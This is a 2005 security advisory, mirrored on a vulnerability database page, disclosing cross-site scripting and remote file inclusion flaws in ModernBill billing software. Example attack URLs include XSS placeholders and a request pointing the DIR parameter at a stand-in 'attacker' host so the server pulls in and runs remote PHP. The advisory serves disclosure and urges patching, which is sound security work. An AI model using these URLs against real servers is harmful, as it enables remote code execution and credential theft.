Lucene search
K

modernBill.txt

🗓️ 18 Apr 2005 00:00:00Reported by James BercegayType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

ModernBill prior to version 4.3.1 has vulnerabilities allowing remote file inclusion and cross site scripting.

Code
`##########################################################  
# GulfTech Security Research April 10th, 2005  
##########################################################  
# Vendor : ModernGigabyte, LLC  
# URL : http://www.modernbill.com/  
# Version : ModernBill 4.3.0 && Earlier  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
  
Description:  
ModernBill is a widely used billing and management software used  
by webhosts to manage billing and financial data. ModernBill is  
prone to remote file inclusion and cross site scripting in version   
prior to 4.3.1. These vulnerabilities could allow for an attacker to   
execute client side code in the context of the victims web browser,   
steal sensitive user data, and run system commands remotely on the   
affected web server. A fixed version is available and users are advised   
to upgrade immediately.  
  
  
  
Cross Site Scripting:  
The ModernBill order forms are prone to multiple cross site scripting   
issues. Below are a few examples of this particular issue.  
  
http://example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS]  
http://example.com/order/orderwiz.php?v=1&aid=[XSS]  
  
This vulnerability could be used to steal cookie based authentication   
credentials within the scope of the current domain, or render hostile   
code in a victim's browser.  
  
  
  
Remote File Include Vulnerability:  
ModernBill ships with a directory titled "samples" that resides in the  
root ModernBill directory. This directory contains several files to  
help users learn how to customize ModernBill to specifically fit their   
needs. One of the scripts included in this directory is vulnerable to  
a very dangerous remote file include vulnerability. Lets have a look at  
the file "news.php"  
  
  
// ~~~~~~~~~~~~~~~~~  
// DO NOT EDIT START  
// ~~~~~~~~~~~~~~~~~  
include_once($DIR."include/functions.inc.php");  
  
  
If globals are set to on, and no include restrictions are in effect then   
we can include any php code of our choice remotely. Of course the   
  
hosting the malicious file to be included could not have php enabled, or   
the file would be parsed before it reached the victim server.   
  
http://example.com/samples/news.php?DIR=http://attacker/  
  
This issue is very dangerous when present, but regardless of your server  
configuration you are still encouraged to upgrade immediately.  
  
  
  
Solution:  
A fix for the mentioned issues has been available for quite some time now  
and users should upgrade their ModernBill installations.  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00067-04102005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
  
--   
No virus found in this outgoing message.  
Checked by AVG Anti-Virus.  
Version: 7.0.308 / Virus Database: 266.9.5 - Release Date: 4/7/2005  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation